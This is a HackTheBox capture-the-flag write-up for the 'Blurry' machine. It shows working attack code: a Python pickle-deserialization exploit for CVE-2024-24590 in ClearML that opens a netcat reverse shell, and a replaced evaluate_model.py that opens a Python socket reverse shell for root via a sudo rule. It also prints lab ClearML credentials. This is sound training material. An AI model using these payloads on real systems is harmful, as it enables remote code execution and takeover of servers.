Skip to main content
  1. Writeups/
  2. HackTheBox/

Blurry Writeup - HackTheBox

·1010 words·5 mins
HackTheBox Linux Medium
Rezy Dev
Author
Rezy Dev
Security Researcher | Web & Network Pentester | AppSec Nerd
Table of Contents
Link:https://app.hackthebox.com/machines/Blurry
DifficultyMedium
MachineLinux

Enumeration
#

I performed a quick Nmap scan on the target to identify open ports:

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

After discovering the open ports, I conducted an aggressive scan on the target for a more in-depth analysis using:

sudo nmap 10.10.11.19 -T4 -vv -sV -sC -O -A

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0B2izYdzgANpvBJW4Ym5zGRggYqa8smNlnRrVK6IuBtHzdlKgcFf+Gw0kSgJEouRe8eyVV9iAyD9HXM2L0N/17+rIZkSmdZPQi8chG/PyZ+H1FqcFB2LyxrynHCBLPTWyuN/tXkaVoDH/aZd1gn9QrbUjSVo9mfEEnUduO5Abf1mnBnkt3gLfBWKq1P1uBRZoAR3EYDiYCHbuYz30rhWR8SgE7CaNlwwZxDxYzJGFsKpKbR+t7ScsviVnbfEwPDWZVEmVEd0XYp1wb5usqWz2k7AMuzDpCyI8klc84aWVqllmLml443PDMIh1Ud2vUnze3FfYcBOo7DiJg7JkEWpcLa6iTModTaeA1tLSUJi3OYJoglW0xbx71di3141pDyROjnIpk/K45zR6CbdRSSqImPPXyo3UrkwFTPrSQbSZfeKzAKVDZxrVKq+rYtd+DWESp4nUdat0TXCgefpSkGfdGLxPZzFg0cQ/IF1cIyfzo1gicwVcLm4iRD9umBFaM2E=
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFMB/Pupk38CIbFpK4/RYPqDnnx8F2SGfhzlD32riRsRQwdf19KpqW9Cfpp2xDYZDhA3OeLV36bV5cdnl07bSsw=
|   256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOjcxHOO/Vs6yPUw6ibE6gvOuakAnmR7gTk/yE2yJA/3
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0

I discovered that the HTTP server is hosted at blurry.htb, and the Nmap results also revealed app.blurry.htb. To access these web pages, I added both domains to the /etc/hosts file using the following command:

echo "10.10.11.19 blurry.htb app.blurry.htb" >> /etc/hosts

I also ran a Gobuster vhost scan to search for additional subdomains:

gobuster vhost -u blurry.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 90 --append-domain

Surprisingly, the scan revealed more subdomains. I added all of them to the /etc/hosts file as well:

echo "10.10.11.19 blurry.htb app.blurry.htb files.blurry.htb chat.blurry.htb api.blurry.htb" >> /etc/hosts

After visiting all the subdomains, I noticed that files.blurry.htb only displayed a simple “OK” message.

The app.blurry.htb subdomain hosts ClearML, a platform used for building AI projects. When submitting any name, it allows users to join a project as a developer. The next step is to configure it on our local machine.

Untitled

The chat.blurry.htb subdomain hosts the third-party service Rocket.Chat on its own.

Untitled

It looks similar to Discord. I registered an account and logged in to the page.

Untitled

There seems to be a default #general channel for new accounts, which reveals that jippity is the admin.

User Flag
#

Now, I will try to set up ClearML locally on my machine.

I followed this guide to set it up:

┌──(kali㉿kali)-[~/blurry]
└─$ sudo apt install python3.11-venv
[sudo] password for kali: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  libdaxctl1 libgphoto2-l10n libndctl6 libntfs-3g89 libpmem1 libre2-10 linux-image-6.6.9-amd64 python3-mistune0
  samba-ad-provision samba-dsdb-modules
Use 'sudo apt autoremove' to remove them.
The following NEW packages will be installed:
  python3.11-venv
0 upgraded, 1 newly installed, 0 to remove and 394 not upgraded.
Need to get 5,884 B of archives.
After this operation, 28.7 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 python3.11-venv amd64 3.11.9-1 [5,884 B]
Fetched 5,884 B in 0s (62.8 kB/s)
Selecting previously unselected package python3.11-venv.
(Reading database ... 461710 files and directories currently installed.)
Preparing to unpack .../python3.11-venv_3.11.9-1_amd64.deb ...
Unpacking python3.11-venv (3.11.9-1) ...
Setting up python3.11-venv (3.11.9-1) ...

┌──(kali㉿kali)-[~/blurry]
└─$ python3 -m venv .env            

┌──(kali㉿kali)-[~/blurry]
└─$ source .env/bin/activate

┌──(.env)─(kali㉿kali)-[~/blurry]
└─$ pip install clearml
[...INSTALLING CLEARML....]

┌──(.env)─(kali㉿kali)-[~/blurry]
└─$ clearml-init
ClearML SDK setup process

Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration) 
Or create a free account at https://app.clear.ml/settings/workspace-configuration

In settings page, press "Create new credentials", then press "Copy to clipboard".

Paste copied configuration here:
api {
  web_server: http://app.blurry.htb
  api_server: http://api.blurry.htb
  files_server: http://files.blurry.htb
  credentials {
    "access_key" = "Y2Y197NIHJ5OJJRTFBAR"
    "secret_key" = "Kx5UxAWA9XaiR9wyiodtWoxxGjrO5lPPLeF1MhwOjZagsDGXH3"
  }
}
Detected credentials key="Y2Y197NIHJ5OJJRTFBAR" secret="Kx5U***"

ClearML Hosts configuration:
Web App: http://app.blurry.htb
API: http://api.blurry.htb
File Store: http://files.blurry.htb

Verifying credentials ...
Credentials verified!

New configuration stored in /home/kali/clearml.conf
ClearML setup completed successfully.

The configuration file can be found at the app.blurry.htb endpoint when we enter a username, select “New Experiment,” and retrieve the config file from there.

Untitled

I found a recent CVE-2024–24590: Pickle Load on Artifact Get related to ClearML. The following is the script we will be using.

import os
import subprocess
from clearml import Task

class ShellExecutor:
    def __reduce__(self):
        cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.62 4444 >/tmp/f"
        return (subprocess.call, (cmd,))

shell_executor = ShellExecutor()

task = Task.init(
    project_name="Black Swan",
    task_name="r3zyd3v",
    tags=["review"],
    task_type=Task.TaskTypes.data_processing,
    output_uri=True
)

task.upload_artifact(
    name="r3zyd3v",
    artifact_object=shell_executor,
    retries=2,
    wait_on_upload=True
)

task.execute_remotely(queue_name='default')

Now, if I execute the above script in the same location where I installed ClearML, I will get a shell on port 4444. In my script, I have specified my tun0 IP address and the port for the reverse shell:

cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.62 4444 >/tmp/f" here.

Once we run the script, it creates a task, uploads the artifact, and then we receive the shell.

At this point, we have a shell as the user and have obtained the user flag.

Root Flag
#

If I run sudo -l, I can see that I can execute the /usr/bin/evaluate_model binary as root without needing a password.

jippity@blurry:~$ sudo -l
Matching Defaults entries for jippity on blurry:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jippity may run the following commands on blurry:
    (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth

This Bash script searches for files that end with .pth in the /models directory, removes any malicious content, and then executes them. I also checked that we have write access to the models directory.

I will now open a Netcat session on my Kali machine on port 6969. Then, I removed the evaluate_model.py script from the /models directory.

jippity@blurry:~$ cd /models
jippity@blurry:/models$ ls
demo_model.pth  evaluate_model.py
jippity@blurry:/models$ rm -r evaluate_model.py 
rm: remove write-protected regular file 'evaluate_model.py'? y
jippity@blurry:/models$ ls
demo_model.pth

I created the same file (which I made using echo and appended the code) named evaluate_model.py with the script shown below (the output of the cat command):

jippity@blurry:/models$ echo 'import socket, subprocess, os, pty; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.16.62", 6969)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn("/bin/bash")' > evaluate_model.py
jippity@blurry:/models$ cat evaluate_model.py 
echo 'import socket, subprocess, os, pty; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.16.62", 6969)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn("/bin/bash")' > evaluate_model.py

I ran sudo /usr/bin/evaluate_model /models/*.pth, and when I checked my Netcat session, I saw:

┌──(kali㉿kali)-[~/blurry/CVE]
└─$ nc -lnvp 6969
listening on [any] 6969 ...
connect to [10.10.16.62] from (UNKNOWN) [10.10.11.19] 35976
root@blurry:/models# cd ~
cd ~
root@blurry:~# id  
id
uid=0(root) gid=0(root) groups=0(root)

We rooted this box.

Conclusion
#

Thank you for following my write-up for this medium yet fun box from Hack The Box!